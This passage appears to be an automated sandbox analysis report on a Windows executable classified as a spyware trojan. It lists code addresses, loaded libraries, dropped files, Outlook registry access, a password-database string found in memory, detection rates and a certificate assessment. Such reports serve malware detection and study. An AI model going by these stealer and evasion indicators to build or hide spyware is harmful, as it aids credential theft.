            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3811324012_2_38113240
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3811004012_2_38110040
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_38111C6012_2_38111C60
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_38114E6012_2_38114E60
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3811388012_2_38113880
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3811068012_2_38110680
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3811C68812_2_3811C688
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_38119AB112_2_38119AB1
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3811FAB812_2_3811FAB8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_381154A012_2_381154A0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_381122A012_2_381122A0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3811C0A812_2_3811C0A8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3811FAAE12_2_3811FAAE
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_38113EC012_2_38113EC0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_38110CC012_2_38110CC0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_381128E012_2_381128E0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_38112F1012_2_38112F10
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3811450012_2_38114500
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3811130012_2_38111300
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_38112F2012_2_38112F20
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_38114B4012_2_38114B40
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3811194012_2_38111940
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3811356012_2_38113560
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3811036012_2_38110360
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3811518012_2_38115180
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_38111F8012_2_38111F80
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3811C38F12_2_3811C38F
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_38113BA012_2_38113BA0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_381109A012_2_381109A0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_381195A212_2_381195A2
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_381157C012_2_381157C0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_381125C012_2_381125C0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3811DDC812_2_3811DDC8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_38112BF812_2_38112BF8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_381141E012_2_381141E0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_38110FE012_2_38110FE0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3812004012_2_38120040
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3812DE8012_2_3812DE80
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3812E1A012_2_3812E1A0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_381267C012_2_381267C0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3812001412_2_38120014
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3812D20012_2_3812D200
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_38126E0012_2_38126E00
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3812A00012_2_3812A000
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3812EE2012_2_3812EE20
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3812BC2012_2_3812BC20
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_38128A2012_2_38128A20
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3812D84012_2_3812D840
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3812744012_2_38127440
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3812A64012_2_3812A640
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3812F46012_2_3812F460
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3812C26012_2_3812C260
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3812906012_2_38129060
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_38127A8012_2_38127A80
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3812AC8012_2_3812AC80
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3812FAA012_2_3812FAA0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3812C8A012_2_3812C8A0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_381296A012_2_381296A0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3812E4C012_2_3812E4C0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3812B2C012_2_3812B2C0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_381280C012_2_381280C0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3812CEE012_2_3812CEE0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_38126AE012_2_38126AE0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_38129CE012_2_38129CE0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3812EB0012_2_3812EB00
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3812870012_2_38128700
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3812B90012_2_3812B900
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3812D52012_2_3812D520
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3812712012_2_38127120
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3812A32012_2_3812A320
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3812F14012_2_3812F140
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3812BF4012_2_3812BF40
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_38128D4012_2_38128D40
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3812DB6012_2_3812DB60
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3812776012_2_38127760
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3812A96012_2_3812A960
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3812F78012_2_3812F780
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3812C58012_2_3812C580
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3812938012_2_38129380
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_38127DA012_2_38127DA0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3812AFA012_2_3812AFA0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3812CBC012_2_3812CBC0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_381299C012_2_381299C0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3812E7E012_2_3812E7E0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_381283E012_2_381283E0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3812B5E012_2_3812B5E0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_38151C1812_2_38151C18
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3815CC3812_2_3815CC38
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3815004012_2_38150040
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3815647812_2_38156478
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3815153012_2_38151530
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3815793812_2_38157938
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3815E12612_2_3815E126
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_38158DF812_2_38158DF8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_381529E812_2_381529E8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_38150E4812_2_38150E48
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_381536B612_2_381536B6
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3815A2C212_2_3815A2C2
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3815230012_2_38152300
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_38154F2712_2_38154F27
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3815072812_2_38150728
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3815B77A12_2_3815B77A
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_38151C0812_2_38151C08
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3815003A12_2_3815003A
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3815CC6012_2_3815CC60
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3815152212_2_38151522
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_381529D812_2_381529D8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_38150E3812_2_38150E38
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_381522F112_2_381522F1
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_3815071A12_2_3815071A
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: String function: 00402BCE appears 50 times
            Source: CWu89IbJQw.exeStatic PE information: invalid certificate
            Source: CWu89IbJQw.exe, 0000000C.00000002.3589065560.0000000004722000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs CWu89IbJQw.exe
            Source: CWu89IbJQw.exe, 0000000C.00000002.3609100488.0000000034CA7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs CWu89IbJQw.exe
            Source: CWu89IbJQw.exe, 0000000C.00000003.3004838964.0000000004722000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs CWu89IbJQw.exe
            Source: CWu89IbJQw.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/14@5/5
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,12_2_00403348
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 0_2_0040460D GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_0040460D
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,0_2_0040216B
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeFile created: C:\Program Files (x86)\HypotesersJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\doggingJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeMutant created: NULL
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeFile created: C:\Users\user\AppData\Local\Temp\nsz787.tmpJump to behavior
            Source: CWu89IbJQw.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: CWu89IbJQw.exe, 0000000C.00000002.3609880075.000000003513D000.00000004.00000800.00020000.00000000.sdmp, CWu89IbJQw.exe, 0000000C.00000002.3609880075.0000000035149000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: CWu89IbJQw.exeReversingLabs: Detection: 70%
            Source: CWu89IbJQw.exeVirustotal: Detection: 72%
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeFile read: C:\Users\user\Desktop\CWu89IbJQw.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\CWu89IbJQw.exe "C:\Users\user\Desktop\CWu89IbJQw.exe"
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess created: C:\Users\user\Desktop\CWu89IbJQw.exe "C:\Users\user\Desktop\CWu89IbJQw.exe"
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess created: C:\Users\user\Desktop\CWu89IbJQw.exe "C:\Users\user\Desktop\CWu89IbJQw.exe"Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeFile written: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\dogging\dynamits\Tvejrs.iniJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: CWu89IbJQw.exeStatic file information: File size 1176848 > 1048576
            Source: CWu89IbJQw.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000000.00000002.2517702962.0000000003331000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3585420008.00000000022C1000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 0_2_738F1A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_738F1A98
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 0_2_738F2F60 push eax; ret 0_2_738F2F8E
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_04589C30 push esp; retf 045Ah12_2_04589D55
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_0458891E pushad ; iretd 12_2_0458891F

            Persistence and Installation Behavior

            barindex
            Source: Initial sampleJoe Sandbox AI: Detected suspicious elements in PE signature: Multiple highly suspicious indicators: 1) The email domain 'Graphospasm.Mu' appears randomly generated and uses an unusual Mauritius TLD (.Mu), very suspicious for malware. 2) Organization 'Forankret' has no known reputation and appears fabricated. 3) The certificate is self-signed (issuer matches subject) which is a major red flag. 4) Certificate validation explicitly failed with untrusted root error. 5) The compilation timestamp (July 2021) is significantly older than the certificate creation date (Jan 2025), suggesting possible timestamp manipulation. 6) The unusual OU field 'Rapse outfront' appears meaningless/randomly generated. While the US location might seem legitimate, all other certificate attributes strongly indicate this is a fraudulent certificate likely created for malicious purposes.
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeFile created: C:\Users\user\AppData\Local\Temp\nsf7A8.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
